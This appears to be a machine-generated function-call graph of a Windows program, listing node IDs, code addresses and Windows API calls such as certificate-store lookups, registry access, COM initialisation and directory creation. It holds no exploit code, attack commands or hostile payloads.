76964->76931 76965->76958 76967 623519 CertEnumCertificatesInStore 76972 62353f 76967->76972 76968 6234d4 76968->76967 76969 592624 269 API calls 76968->76969 76969->76967 76973 592624 269 API calls 76973->76975 76975->76958 76975->76961 76975->76968 76975->76973 76976 623823 76975->76976 76977 623459 GetCurrentThreadId 76975->76977 77132 628842 524 API calls __EH_prolog3_catch_GS 76975->77132 77136 6227c0 279 API calls __EH_prolog3_catch 76976->77136 76977->76975 76990 623841 76990->76958 77029->76835 77030->76852 77031->76864 77033 623d51 __EH_prolog3_catch 77032->77033 77034 623d7a 77033->77034 77035 61f862 99 API calls 77033->77035 77041 623d8a 77034->77041 77146 5f0dba 6 API calls 77034->77146 77036 623da2 77035->77036 77037 5f65b4 67 API calls 77036->77037 77039 623daa 77037->77039 77040 5f65f4 67 API calls 77039->77040 77040->77034 77041->76864 77042->76869 77043->76835 77045 61f86e __EH_prolog3_catch_GS 77044->77045 77046 5f663a RegCloseKey 77045->77046 77047 61f882 77046->77047 77048 61f8a6 77047->77048 77049 61f8ff 77047->77049 77054 61f8b9 GetCurrentThreadId 77048->77054 77056 61f8df 77048->77056 77050 61f903 77049->77050 77051 61f93e 77049->77051 77055 61f916 GetCurrentThreadId 77050->77055 77050->77056 77052 5f7229 19 API calls 77051->77052 77053 61f953 77052->77053 77053->77056 77077 5f6f96 82 API calls __EH_prolog3 77053->77077 77054->77056 77055->77056 77057 61f8f6 77056->77057 77076 5f0dba 6 API calls 77056->77076 77060 5f6690 2 API calls 77057->77060 77062 61f9d3 77060->77062 77061 61f96e 77063 59ef10 2 API calls 77061->77063 77062->76900 77064 61f991 77063->77064 77064->77056 77065 61f99e 77064->77065 77065->77057 77078 5f0dba 6 API calls 77065->77078 77067->76898 77070 5f65c6 77068->77070 77069 5f65ee 77072 5f65f4 77069->77072 77070->77069 77071 59ffa1 67 API calls 77070->77071 77071->77069 77074 5f6605 77072->77074 77073 5f6635 77073->76899 77074->77073 77075 59ffa1 67 API calls 77074->77075 77075->77073 77076->77057 77077->77061 77078->77057 77079->76915 77080->76921 77082 6240dd __EH_prolog3_catch 77081->77082 77083 62415d 77082->77083 77084 592624 269 API calls 77082->77084 77085 5f646b 76 API calls 77083->77085 77084->77083 77086 624170 77085->77086 77087 624179 77086->77087 77088 6241cc 77086->77088 77092 6241b1 77087->77092 77093 624185 GetCurrentThreadId 77087->77093 77089 624234 77088->77089 77094 6241e2 77088->77094 77090 5f3f50 2 API calls 77089->77090 77091 62424a 77090->77091 77096 62432b CertOpenStore 77091->77096 77098 5f65b4 67 API calls 77091->77098 77104 5f65f4 67 API calls 77091->77104 77123 592624 269 API calls 77091->77123 77125 6242d2 77091->77125 77141 623e95 17 API calls __EH_prolog3_catch 77091->77141 77116 6241c3 77092->77116 77139 5f0dba 6 API calls 77092->77139 77093->77092 77105 592624 269 API calls 77094->77105 77107 624214 77094->77107 77097 624361 CertFindChainInStore 77096->77097 77102 624381 77097->77102 77098->77091 77100 6244ae CertCloseStore 77106 62422b 77100->77106 77101 624443 77120 624319 77101->77120 77145 5f0dba 6 API calls 77101->77145 77102->77097 77102->77101 77110 62439f 77102->77110 77114 62440b GetLastError 77102->77114 77143 6266dc 502 API calls __EH_prolog3_catch_GS 77102->77143 77104->77091 77105->77107 77108 6244ea 77106->77108 77112 592624 269 API calls 77106->77112 77107->77106 77140 5f0dba 6 API calls 77107->77140 77109 59f01d 2 API calls 77108->77109 77113 6244f8 77109->77113 77118 6243d7 77110->77118 77119 6243ab GetCurrentThreadId 77110->77119 77112->77108 77113->76951 77115 592624 269 API calls 77114->77115 77115->77102 77116->77100 77116->77106 77118->77120 77144 5f0dba 6 API calls 77118->77144 77119->77118 77120->77116 77121 624497 77120->77121 77124 5f3f60 2 API calls 77120->77124 77122 5f3f60 2 API calls 77121->77122 77122->77116 77123->77091 77124->77120 77127 624307 77125->77127 77128 6242de GetCurrentThreadId 77125->77128 77127->77120 77142 5f0dba 6 API calls 77127->77142 77128->77127 77130->76931 77131->76960 77132->76975 77136->76990 77139->77116 77140->77106 77141->77091 77142->77120 77143->77102 77144->77120 77145->77120 77146->77041 77147->76764 77148->76760 77149->76764 77151 57868a 77150->77151 77154 5786c7 77151->77154 77161 573f58 RaiseException VirtualAlloc RtlAllocateHeap __EH_prolog3_catch 77151->77161 77153 5786b6 77162 574c64 69 API calls __EH_prolog3_catch 77153->77162 77154->76783 77156->76808 77157->76808 77158->76808 77159->76808 77160->76808 77161->77153 77162->77154 77163 57ff30 77164 5a1cab 2 API calls 77163->77164 77165 57ff46 77164->77165 77166 59ef10 2 API calls 77165->77166 77167 57ff70 77166->77167 77213 5b619e 77167->77213 77169 57ff7c 77170 57ffbc 77169->77170 77171 580796 77169->77171 77172 586ac2 1004 API calls 77170->77172 77173 58074a 77171->77173 77242 5f0dba 6 API calls 77171->77242 77175 57ffcf 77172->77175 77176 59ef10 2 API calls 77173->77176 77178 580000 77175->77178 77179 592624 269 API calls 77175->77179 77177 5807ee 77176->77177 77180 59ef10 2 API calls 77177->77180 77181 5a2aa8 642 API calls 77178->77181 77179->77178 77182 5807ff 77180->77182 77183 5805bd 77181->77183 77184 59ef10 2 API calls 77182->77184 77185 5a1cab 2 API calls 77183->77185 77186 580810 77184->77186 77190 5805d2 77185->77190 77187 59ef10 2 API calls 77186->77187 77188 58081e 77187->77188 77189 59ef10 2 API calls 77188->77189 77191 58082f 77189->77191 77192 59ef10 2 API calls 77190->77192 77193 59ef10 2 API calls 77191->77193 77194 5805fc 77192->77194 77195 580841 77193->77195 77196 58068f 77194->77196 77199 5f52af 68 API calls 77194->77199 77197 59f01d 2 API calls 77195->77197 77203 580738 77196->77203 77239 5b2fc1 472 API calls 77196->77239 77201 580850 77197->77201 77200 580623 77199->77200 77200->77196 77206 5b7119 99 API calls 77200->77206 77202 58069e 77202->77203 77204 5806a7 77202->77204 77203->77173 77241 5f0dba 6 API calls 77203->77241 77205 5f646b 76 API calls 77204->77205 77211 5806d8 77205->77211 77209 58063c 77206->77209 77208 5a162c 83 API calls 77208->77196 77209->77203 77209->77208 77212 59ef10 2 API calls 77211->77212 77240 578f19 71 API calls 77211->77240 77212->77211 77214 5b61aa __EH_prolog3_catch 77213->77214 77215 5f663a RegCloseKey 77214->77215 77216 5b61b2 77215->77216 77217 5f52cb 67 API calls 77216->77217 77218 5b61e5 77217->77218 77219 5b183e 15 API calls 77218->77219 77220 5b61ee 77219->77220 77221 5f7229 19 API calls 77220->77221 77222 5b6205 77221->77222 77223 5b625a 77222->77223 77226 5b620e 77222->77226 77244 5f6fe7 82 API calls __EH_prolog3_catch 77223->77244 77225 5b626a 77227 5b6273 77225->77227 77228 5b62a4 77225->77228 77229 5b621a GetCurrentThreadId 77226->77229 77230 5b623d 77226->77230 77227->77230 77234 5b627f GetCurrentThreadId 77227->77234 77235 5b6254 77228->77235 77245 5f0dba 6 API calls 77228->77245 77229->77230 77230->77235 77243 5f0dba 6 API calls 77230->77243 77233 5b6300 77236 5f6690 2 API calls 77233->77236 77234->77230 77235->77233 77238 592624 269 API calls 77235->77238 77237 5b630f 77236->77237 77237->77169 77238->77233 77239->77202 77240->77211 77241->77173 77242->77173 77243->77235 77244->77225 77245->77235 77246 5a0c83 77261 5d2288 77246->77261 77248 5a0c92 CoInitializeEx 77249 5a0ca7 77248->77249 77250 5a0d95 77248->77250 77262 576c9e 77249->77262 77252 5a0cb2 77277 58c6de 77252->77277 77254 5a0cc0 77255 5a0d7d 77254->77255 77362 59daad 77254->77362 77467 5779b2 77255->77467 77261->77248 77263 576caa __EH_prolog3 77262->77263 77543 576a74 77263->77543 77265 576cd0 77266 576a74 3 API calls 77265->77266 77267 576cdf 77266->77267 77268 576a74 3 API calls 77267->77268 77269 576cee 77268->77269 77270 576a74 3 API calls 77269->77270 77271 576d64 77270->77271 77547 576aa1 77271->77547 77273 576ed3 77551 576b3b 77273->77551 77275 576ee5 InitializeCriticalSection 77276 576f18 77275->77276 77276->77252 77278 58c6ea __EH_prolog3_catch_GS 77277->77278 77591 5fb1b1 77278->77591 77280 58c71c 77281 58c725 77280->77281 77282 58c776 77280->77282 77285 58c731 GetCurrentThreadId 77281->77285 77289 58c754 77281->77289 77604 57dada 77282->77604 77284 58c77d 77286 58c786 77284->77286 77287 58c7b7 77284->77287 77285->77289 77286->77289 77292 58c792 GetCurrentThreadId 77286->77292 77615 58d37e 77287->77615 77361 58c76d 77289->77361 77789 5f0dba 6 API calls 77289->77789 77292->77289 77293 58cdf5 77293->77254 77296 592624 269 API calls 77296->77293 77361->77293 77361->77296 77363 59dab9 __EH_prolog3_catch_GS 77362->77363 78383 5fc559 77363->78383 77365 59dae6 77366 59daef 77365->77366 78527 5b25a8 288 API calls __EH_prolog3_catch_GS 77365->78527 78388 5967fc 77366->78388 77468 5779be __EH_prolog3 77467->77468 77469 5779d6 UnmapViewOfFile 77468->77469 77470 5779e3 77468->77470 77469->77470 78974 577994 77470->78974 77472 5779f2 78977 62ccd6 77472->78977 77544 576a80 __EH_prolog3 77543->77544 77555 59e5c2 77544->77555 77546 576a93 77546->77265 77548 576aad __EH_prolog3 77547->77548 77567 59e29f 77548->77567 77550 576abe 77550->77273 77552 576b47 __EH_prolog3 77551->77552 77579 658be4 77552->77579 77554 576b58 77554->77275 77556 59e5ce __EH_prolog3_catch 77555->77556 77559 59f2b1 77556->77559 77558 59e5e7 77558->77546 77560 59f2d0 77559->77560 77561 59f2e2 77560->77561 77562 5f3f50 2 API calls 77560->77562 77564 59f2e6 77561->77564 77566 5d21c0 RaiseException 77561->77566 77562->77561 77564->77558 77565 59f307 77566->77565 77568 59e2ab __EH_prolog3_catch 77567->77568 77571 59f15d 77568->77571 77570 59e2c4 77570->77550 77572 59f17c 77571->77572 77573 59f18e 77572->77573 77574 5f3f50 2 API calls 77572->77574 77576 59f192 77573->77576 77578 5d21c0 RaiseException 77573->77578 77574->77573 77576->77570 77577 59f1b3 77578->77577 77580 658bf0 __EH_prolog3_catch 77579->77580 77583 5b083e 77580->77583 77582 658c09 77582->77554 77584 5b0859 77583->77584 77585 5b086b 77584->77585 77586 5f3f50 2 API calls 77584->77586 77587 5b086f 77585->77587 77590 5d21c0 RaiseException 77585->77590 77586->77585 77587->77582 77589 5b0890 77590->77589 77592 5fb1c0 __EH_prolog3_catch_GS 77591->77592 77593 5fb28c ExpandEnvironmentStringsW 77592->77593 77594 5fb213 ExpandEnvironmentStringsW 77592->77594 77595 5fb29b GetLastError 77593->77595 77601 5fb26c 77593->77601 77596 5fb226 GetLastError 77594->77596 77594->77601 77597 5fb2ba 77595->77597 77598 5fb245 77596->77598 77600 5fb2be GetCurrentThreadId 77597->77600 77597->77601 77599 5fb249 GetCurrentThreadId 77598->77599 77598->77601 77599->77601 77600->77601 77603 5fb283 77601->77603 77793 5f0dba 6 API calls 77601->77793 77603->77280 77605 57dae6 __EH_prolog3_catch 77604->77605 77606 57db17 GetFileAttributesW 77605->77606 77607 57db23 CreateDirectoryW 77606->77607 77608 57db82 77606->77608 77607->77608 77612 57db38 GetLastError 77607->77612 77611 57db92 77608->77611 77794 5f0dba 6 API calls 77608->77794 77611->77284 77613 57db54 77612->77613 77613->77608 77614 57db58 GetCurrentThreadId 77613->77614 77614->77608 77616 58d38a __EH_prolog3_catch_GS 77615->77616 77617 5f4253 76 API calls 77616->77617 77618 58d3a4 77617->77618 77619 605d68 85 API calls 77618->77619 77620 58d3ea 77619->77620 77621 58d407 77620->77621 77622 58d3f7 77620->77622 77830 59c905 290 API calls __EH_prolog3_catch 77621->77830 77624 607fc3 113 API calls 77622->77624 77625 58d405 77624->77625 77626 5f4253 76 API calls 77625->77626 77627 58d429 77626->77627 77789->77361 77793->77603 77794->77611 77830->77625 78384 5fc57e 78383->78384 78385 5fc562 78383->78385 78384->77365 78557 5fe471 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW ___crtMessageBoxW 78385->78557 78387 5fc571 78387->77365 78389 59680b __EH_prolog3_catch_GS 78388->78389 78558 5c86bd 78389->78558 78527->77366 78557->78387 78677 5c86ed 78558->78677 78678 5c86fc __EH_prolog3_catch 78677->78678 78679 6093a0 VariantInit 78678->78679 78681 5c8757 78679->78681 78680 5c878a CoCreateInstance 78681->78680 78975 5779a6 DeleteCriticalSection 78974->78975 78976 57799e CloseHandle 78974->78976 78975->77472 78976->78975 78978 62cce2 __EH_prolog3 78977->78978 79019 62eefd 78978->79019 78981 5f3f60 2 API calls 78982 62cd04 78981->78982 79020 62ef10 79019->79020 79024 62ef25 79019->79024 79021 62ef15 79020->79021 79020->79024 79026 5b08f5 RtlFreeHeap VirtualFree 79021->79026 79022 62ccf9 79022->78981 79024->79022 79027 62ef4e RtlFreeHeap VirtualFree 79024->79027 79026->79022 79027->79024 79045 57afed 79046 57affc __EH_prolog3_catch_GS 79045->79046 79047 5a1cab 2 API calls 79046->79047 79048 57b043 79047->79048 79049 59ef10 2 API calls 79048->79049 79050 57b06a 79049->79050 79051 57b0b4 79050->79051 79052 57b070 79050->79052 79240 5f6430 67 API calls 79051->79240 79239 5f40e2 269 API calls __EH_prolog3 79052->79239 79055 57b082 79056 5a162c 83 API calls 79055->79056 79058 57b0a0 79056->79058 79057 57b0b2 79060 57b107 79057->79060 79061 592624 269 API calls 79057->79061 79059 59ef10 2 API calls 79058->79059 79059->79057 79062 5a1cab 2 API calls 79060->79062 79061->79060 79063 57b11e 79062->79063 79064 59ef10 2 API calls 79063->79064 79065 57b145 79064->79065 79066 57b18f 79065->79066 79067 57b14b 79065->79067 79242 5f6430 67 API calls 79066->79242 79241 5f40e2 269 API calls __EH_prolog3 79067->79241 79070 57b15d 79071 5a162c 83 API calls 79070->79071 79073 57b17b 79071->79073 79072 57b18d 79074 57b1e2 79072->79074 79076 592624 269 API calls 79072->79076 79075 59ef10 2 API calls 79073->79075 79077 5a1cab 2 API calls 79074->79077 79075->79072 79076->79074 79078 57b1f9 79077->79078 79079 59ef10 2 API calls 79078->79079 79080 57b220 79079->79080 79081 57b226 79080->79081 79082 57b26f 79080->79082 79087 57b26d 79081->79087 79243 5f40e2 269 API calls __EH_prolog3 79081->79243 79244 5f6430 67 API calls 79082->79244 79085 57b23d 79090 5a162c 83 API calls 79085->79090 79086 57b2bc 79089 5a1cab 2 API calls 79086->79089 79087->79086 79088 592624 269 API calls 79087->79088 79088->79086 79093 57b2d3 79089->79093 79091 57b25b 79090->79091 79092 59ef10 2 API calls 79091->79092 79092->79087 79094 59ef10 2 API calls 79093->79094 79095 57b2fa 79094->79095 79100 57b332 79095->79100 79245 5f644b 68 API calls 79095->79245 79097 57b318 79099 5a162c 83 API calls 79097->79099 79098 57b391 79102 5a1cab 2 API calls 79098->79102 79099->79100 79100->79098 79101 592624 269 API calls 79100->79101 79101->79098 79103 57b3ab 79102->79103 79104 59ef10 2 API calls 79103->79104 79105 57b3d1 79104->79105 79106 57b423 79105->79106 79108 57b3d7 79105->79108 79215 5b75a1 79106->79215 79109 57b41b 79108->79109 79112 592624 269 API calls 79108->79112 79111 5a1cab 2 API calls 79109->79111 79110 57b438 79113 57b478 79110->79113 79114 5a1cab 2 API calls 79110->79114 79116 57b4f7 79111->79116 79112->79109 79115 5a162c 83 API calls 79113->79115 79119 57b4ce 79113->79119 79120 57b452 79114->79120 79118 57b49a 79115->79118 79117 59ef10 2 API calls 79116->79117 79121 57b51d 79117->79121 79118->79119 79122 592624 269 API calls 79118->79122 79123 59ef10 2 API calls 79119->79123 79124 59ef10 2 API calls 79120->79124 79125 5a162c 83 API calls 79121->79125 79126 57b54a 79121->79126 79122->79119 79123->79109 79124->79113 79125->79126 79127 57b5a7 79126->79127 79128 592624 269 API calls 79126->79128 79129 5a1cab 2 API calls 79127->79129 79128->79127 79130 57b5be 79129->79130 79131 59ef10 2 API calls 79130->79131 79132 57b5e7 79131->79132 79138 57b660 79132->79138 79246 587752 68 API calls __EH_prolog3 79132->79246 79134 57b6b1 79135 5a1cab 2 API calls 79134->79135 79141 57b6c8 79135->79141 79136 57b5fc 79137 59ef10 2 API calls 79136->79137 79140 57b622 79137->79140 79138->79134 79139 592624 269 API calls 79138->79139 79139->79134 79140->79134 79247 5f644b 68 API calls 79140->79247 79142 59ef10 2 API calls 79141->79142 79148 57b6ee 79142->79148 79144 57b634 79145 5a162c 83 API calls 79144->79145 79145->79138 79146 57b79c 79147 5a1cab 2 API calls 79146->79147 79153 57b7b3 79147->79153 79149 57b74b 79148->79149 79150 59ef10 2 API calls 79148->79150 79149->79146 79151 592624 269 API calls 79149->79151 79152 57b729 79150->79152 79151->79146 79152->79146 79154 5a162c 83 API calls 79152->79154 79155 59ef10 2 API calls 79153->79155 79154->79149 79158 57b7d9 79155->79158 79156 57b87b 79157 5a1cab 2 API calls 79156->79157 79163 57b892 79157->79163 79159 57b836 79158->79159 79160 59ef10 2 API calls 79158->79160 79159->79156 79161 592624 269 API calls 79159->79161 79162 57b814 79160->79162 79161->79156 79162->79156 79165 5a162c 83 API calls 79162->79165 79164 59ef10 2 API calls 79163->79164 79166 57b8b8 79164->79166 79165->79159 79167 57b8ff 79166->79167 79168 57b8be 79166->79168 79249 5f63c7 67 API calls 79167->79249 79248 5f40e2 269 API calls __EH_prolog3 79168->79248 79171 57b8ce 79172 5a162c 83 API calls 79171->79172 79174 57b8eb 79172->79174 79173 57b8fd 79175 57b94e 79173->79175 79177 592624 269 API calls 79173->79177 79176 59ef10 2 API calls 79174->79176 79178 5a1cab 2 API calls 79175->79178 79176->79173 79177->79175 79179 57b965 79178->79179 79180 59ef10 2 API calls 79179->79180 79181 57b98b 79180->79181 79182 57b9d2 79181->79182 79183 57b991 79181->79183 79251 5f63c7 67 API calls 79182->79251 79250 5f40e2 269 API calls __EH_prolog3 79183->79250 79216 5b75ad __EH_prolog3_catch 79215->79216 79217 5f663a RegCloseKey 79216->79217 79218 5b75b5 79217->79218 79219 5f52cb 67 API calls 79218->79219 79220 5b75e8 79219->79220 79221 5b183e 15 API calls 79220->79221 79222 5b75f1 79221->79222 79223 5f7229 19 API calls 79222->79223 79224 5b7608 79223->79224 79225 5b765d 79224->79225 79226 5b7611 79224->79226 79256 5f6fe7 82 API calls __EH_prolog3_catch 79225->79256 79229 5b761d GetCurrentThreadId 79226->79229 79233 5b7640 79226->79233 79228 5b766d 79230 5b76a7 79228->79230 79231 5b7676 79228->79231 79229->79233 79232 5b7657 79230->79232 79257 5f0dba 6 API calls 79230->79257 79231->79233 79237 5b7682 GetCurrentThreadId 79231->79237 79236 5f6690 2 API calls 79232->79236 79233->79232 79255 5f0dba 6 API calls 79233->79255 79238 5b76dc 79236->79238 79237->79233 79238->79110 79239->79055 79240->79057 79241->79070 79242->79072 79243->79085 79244->79087 79245->79097 79246->79136 79247->79144 79248->79171 79249->79173 79255->79232 79256->79228 79257->79232 79258 57f21c 79259 57f249 79258->79259 79260 57f27c 79259->79260 79261 592624 269 API calls 79259->79261 79347 589d80 79260->79347 79261->79260 79263 57f31a 79264 57f33d 79263->79264 79446 578a89 RtlFreeHeap VirtualFree __EH_prolog3 79263->79446 79376 589f37 79264->79376 79268 57f38a 79269 59f01d 2 API calls 79268->79269 79270 57f39d 79269->79270 79279 57f4d3 79270->79279 79448 5769f9 69 API calls __EH_prolog3_catch 79270->79448 79271 57f357 79271->79268 79447 578f19 71 API calls 79271->79447 79272 57f28c 79272->79263 79274 592624 269 API calls 79272->79274 79445 578f19 71 API calls 79272->79445 79274->79272 79276 57f3b5 79277 59f49e 2 API calls 79276->79277 79308 57f3d7 79277->79308 79278 57f6d3 79279->79278 79281 592624 269 API calls 79279->79281 79285 57f52a 79279->79285 79280 57f4ad 79282 59f49e 2 API calls 79280->79282 79281->79285 79284 57f4c0 79282->79284 79283 57f5f5 79288 57f869 79283->79288 79289 5f52af 68 API calls 79283->79289 79286 5f3f60 2 API calls 79284->79286 79285->79283 79285->79288 79290 57f56f 79285->79290 79292 592624 269 API calls 79285->79292 79286->79279 79288->79278 79441 59cc59 79288->79441 79303 57f61c 79289->79303 79293 5a1cab 2 API calls 79290->79293 79292->79290 79296 57f585 79293->79296 79297 57f5e2 79296->79297 79302 586ac2 1004 API calls 79296->79302 79304 59ef10 2 API calls 79297->79304 79299 59ef10 2 API calls 79299->79308 79301 59ef10 2 API calls 79301->79278 79306 57f5a2 79302->79306 79303->79288 79425 5892e8 79303->79425 79304->79283 79306->79297 79310 57f5d7 79306->79310 79314 592624 269 API calls 79306->79314 79307 57f647 79311 57f6df 79307->79311 79312 57f65a 79307->79312 79308->79280 79308->79299 79309 5f52cb 67 API calls 79308->79309 79313 592624 269 API calls 79308->79313 79449 5b7577 68 API calls 79308->79449 79450 5fe32a 78 API calls __EH_prolog3_catch_GS 79308->79450 79451 61d7b0 448 API calls __EH_prolog3_GS 79308->79451 79452 578f19 71 API calls 79308->79452 79309->79308 79316 59f49e 2 API calls 79310->79316 79315 5f4253 76 API calls 79311->79315 79319 57f66c GetCurrentThreadId 79312->79319 79320 57f696 79312->79320 79313->79308 79314->79310 79317 57f6f1 79315->79317 79316->79297 79318 5f4253 76 API calls 79317->79318 79324 57f704 79318->79324 79319->79320 79321 59ef10 2 API calls 79320->79321 79322 57f6ad 79321->79322 79323 59ef10 2 API calls 79322->79323 79325 57f6c1 79323->79325 79326 59ef10 2 API calls 79324->79326 79325->79278 79453 5f0dba 6 API calls 79325->79453 79327 57f72e 79326->79327 79329 59ef10 2 API calls 79327->79329 79330 57f741 79329->79330 79331 605eb4 85 API calls 79330->79331 79332 57f752 79331->79332 79333 57f75c 79332->79333 79335 57f808 79332->79335 79334 57f7a0 79333->79334 79337 592624 269 API calls 79333->79337 79338 592624 269 API calls 79335->79338 79346 57f806 79335->79346 79337->79334 79338->79346 79348 589d8c __EH_prolog3_catch_GS 79347->79348 79349 5f663a RegCloseKey 79348->79349 79350 589da3 79349->79350 79351 5b183e 15 API calls 79350->79351 79352 589dd6 79351->79352 79353 5f7229 19 API calls 79352->79353 79354 589ded 79353->79354 79355 589df6 79354->79355 79356 589e47 79354->79356 79359 589e02 GetCurrentThreadId 79355->79359 79362 589e25 79355->79362 79457 5f6fe7 82 API calls __EH_prolog3_catch 79356->79457 79358 589e58 79360 589e92 79358->79360 79364 589e61 79358->79364 79359->79362 79361 589ed1 79360->79361 79365 589e98 79360->79365 79458 5a0532 71 API calls 79361->79458 79363 589e3e 79362->79363 79456 5f0dba 6 API calls 79362->79456 79370 5f6690 2 API calls 79363->79370 79364->79362 79368 589e6d GetCurrentThreadId 79364->79368 79365->79362 79371 589ea9 GetCurrentThreadId 79365->79371 79368->79362 79369 589edc 79369->79363 79459 5f0dba 6 API calls 79369->79459 79372 589f19 79370->79372 79371->79362 79373 59ef10 2 API calls 79372->79373 79375 589f29 79373->79375 79375->79272 79377 589f43 __EH_prolog3_catch_GS 79376->79377 79378 592624 269 API calls 79377->79378 79379 589f75 79377->79379 79378->79379 79460 63db4f 79379->79460 79381 589fa6 79382 589fae 79381->79382 79391 58a060 79381->79391 79470 624655 79382->79470 79384 589fb7 79385 58a010 79384->79385 79386 589fc0 79384->79386 79482 578f5f 293 API calls __EH_prolog3_GS 79385->79482 79388 589ff6 79386->79388 79389 589fcc GetCurrentThreadId 79386->79389 79390 58a007 79388->79390 79481 5f0dba 6 API calls 79388->79481 79389->79388 79402 58a3e8 79390->79402 79403 58a421 79390->79403 79410 58a0f1 79391->79410 79483 600c18 CoTaskMemFree 79391->79483 79394 58a01f 79395 58a058 79394->79395 79397 592624 269 API calls 79394->79397 79395->79390 79490 5f0dba 6 API calls 79395->79490 79396 58a096 79484 600c18 CoTaskMemFree 79396->79484 79397->79395 79400 58a0a3 79485 600c18 CoTaskMemFree 79400->79485 79401 58a41c 79407 59ef10 2 API calls 79401->79407 79402->79401 79406 592624 269 API calls 79402->79406 79403->79401 79405 592624 269 API calls 79403->79405 79405->79401 79406->79401 79409 58a45a 79407->79409 79408 58a0ac 79486 63cbb8 336 API calls __EH_prolog3_catch_GS 79408->79486 79409->79271 79414 58a2ff 79410->79414 79416 600c18 CoTaskMemFree 79410->79416 79417 58a2d7 GetCurrentThreadId 79410->79417 79418 578f5f 293 API calls 79410->79418 79422 592624 269 API calls 79410->79422 79424 58a1eb GetCurrentThreadId 79410->79424 79487 63d06a 337 API calls __EH_prolog3_catch_GS 79410->79487 79488 63c5a1 342 API calls __EH_prolog3_catch_GS 79410->79488 79412 58a0b2 79412->79410 79415 58a0c7 GetCurrentThreadId 79412->79415 79414->79395 79489 578f5f 293 API calls __EH_prolog3_GS 79414->79489 79415->79410 79416->79410 79417->79414 79418->79410 79421 58a349 79421->79395 79423 592624 269 API calls 79421->79423 79422->79410 79423->79395 79424->79410 79426 5892f4 __EH_prolog3_catch_GS 79425->79426 79427 5a0c32 71 API calls 79426->79427 79428 589346 79427->79428 79429 5f52af 68 API calls 79428->79429 79430 589356 79429->79430 79431 59ef10 2 API calls 79430->79431 79432 589371 79431->79432 79433 5a0c32 71 API calls 79432->79433 79436 5893a7 79432->79436 79434 589387 79433->79434 79439 59ef10 2 API calls 79434->79439 79435 5893cc 79438 59ef10 2 API calls 79435->79438 79436->79435 79514 5f0dba 6 API calls 79436->79514 79440 5893f7 79438->79440 79439->79436 79440->79307 79442 59cc6b 79441->79442 79443 57f892 79442->79443 79444 592624 269 API calls 79442->79444 79443->79301 79444->79443 79445->79272 79446->79263 79447->79271 79448->79276 79449->79308 79450->79308 79451->79308 79452->79308 79453->79278 79456->79363 79457->79358 79458->79369 79459->79363 79461 63db5b __EH_prolog3_catch 79460->79461 79462 62552c 24 API calls 79461->79462 79463 63db88 79462->79463 79469 63db91 79463->79469 79492 63ca35 471 API calls __EH_prolog3_catch 79463->79492 79465 63dbb9 79468 63dbc8 GetCurrentThreadId 79465->79468 79465->79469 79466 63dba2 79466->79381 79468->79469 79469->79466 79491 5f0dba 6 API calls 79469->79491 79471 624661 __EH_prolog3_catch_GS 79470->79471 79493 62458b 79471->79493 79473 62469d 79474 6246a6 79473->79474 79475 6246be 79473->79475 79477 6246b8 79474->79477 79511 5f0dba 6 API calls 79474->79511 79475->79477 79512 5f0dba 6 API calls 79475->79512 79479 59ef10 2 API calls 79477->79479 79480 6246f9 79479->79480 79480->79384 79481->79390 79482->79394 79483->79396 79484->79400 79485->79408 79486->79412 79487->79410 79488->79410 79489->79421 79490->79390 79491->79466 79492->79465 79494 624597 __EH_prolog3_catch 79493->79494 79495 61f862 99 API calls 79494->79495 79496 6245c6 79495->79496 79497 5f65b4 67 API calls 79496->79497 79510 6245cf 79496->79510 79498 6245ed 79497->79498 79500 5f65f4 67 API calls 79498->79500 79501 6245f5 79500->79501 79503 61f559 24 API calls 79501->79503 79502 6245df 79502->79473 79504 624603 79503->79504 79505 61f862 99 API calls 79504->79505 79504->79510 79506 62461a 79505->79506 79507 5f65b4 67 API calls 79506->79507 79506->79510 79508 62462b 79507->79508 79509 5f65f4 67 API calls 79508->79509 79509->79510 79510->79502 79513 5f0dba 6 API calls 79510->79513 79511->79477 79512->79477 79513->79502 79514->79435 79515 5945c4 79516 5945cd 79515->79516 79517 5a1cab 2 API calls 79516->79517 79518 5945d7 79517->79518 79519 59ef10 2 API calls 79518->79519 79520 594606 79519->79520 79521 5a1cab 2 API calls 79520->79521 79522 59461d 79521->79522 79523 59ef10 2 API calls 79522->79523 79526 59464c 79523->79526 79524 5946da 79629 5fb9eb 79524->79629 79526->79524 79593 62a2e9 79526->79593 79528 594679 79529 5946cb 79528->79529 79532 5a162c 83 API calls 79528->79532 79644 654b6b RtlFreeHeap VirtualFree __EH_prolog3 79529->79644 79531 5946ed 79535 592624 269 API calls 79531->79535 79539 59475b 79531->79539 79533 5946a4 79532->79533 79534 5a162c 83 API calls 79533->79534 79534->79529 79535->79539 79536 59496d 79541 5949ab 79536->79541 79645 598181 350 API calls __EH_prolog3_catch_GS 79536->79645 79537 5947d6 79537->79536 79540 5f41ca 76 API calls 79537->79540 79539->79537 79544 59312e 79539->79544 79545 5947ae GetCurrentThreadId 79539->79545 79542 59480b 79540->79542 79646 5795e9 1050 API calls __EH_prolog3_catch_GS 79541->79646 79543 5f4253 76 API calls 79542->79543 79546 594826 79543->79546 79552 593140 79544->79552 79643 5f0dba 6 API calls 79544->79643 79545->79537 79548 5f4253 76 API calls 79546->79548 79550 59483c 79548->79550 79556 59ef10 2 API calls 79550->79556 79551 59ef10 2 API calls 79554 59534a 79551->79554 79552->79551 79553 5949c6 79553->79544 79555 5949e5 GetCurrentThreadId 79553->79555 79557 59ef10 2 API calls 79554->79557 79555->79552 79558 594863 79556->79558 79559 59535d 79557->79559 79560 59ef10 2 API calls 79558->79560 79561 59ef10 2 API calls 79559->79561 79562 59487f 79560->79562 79563 595370 79561->79563 79564 59ef10 2 API calls 79562->79564 79565 59ef10 2 API calls 79563->79565 79566 594896 79564->79566 79567 595383 79565->79567 79569 59ef10 2 API calls 79566->79569 79568 59ef10 2 API calls 79567->79568 79571 595396 79568->79571 79570 5948ad 79569->79570 79574 5f41ca 76 API calls 79570->79574 79572 59ef10 2 API calls 79571->79572 79573 5953a9 79572->79573 79575 59ef10 2 API calls 79573->79575 79576 5948d5 79574->79576 79577 5953bc 79575->79577 79578 5f4253 76 API calls 79576->79578 79579 59ef10 2 API calls 79577->79579 79580 5948eb 79578->79580 79581 5953cf 79579->79581 79582 5f4253 76 API calls 79580->79582 79583 5953e5 ___crtMessageBoxW 79581->79583 79584 5953d7 LocalFree 79581->79584 79585 594901 79582->79585 79584->79583 79586 59ef10 2 API calls 79585->79586 79587 594928 79586->79587 79588 59ef10 2 API calls 79587->79588 79589 59493f 79588->79589 79590 59ef10 2 API calls 79589->79590 79591 594956 79590->79591 79592 59ef10 2 API calls 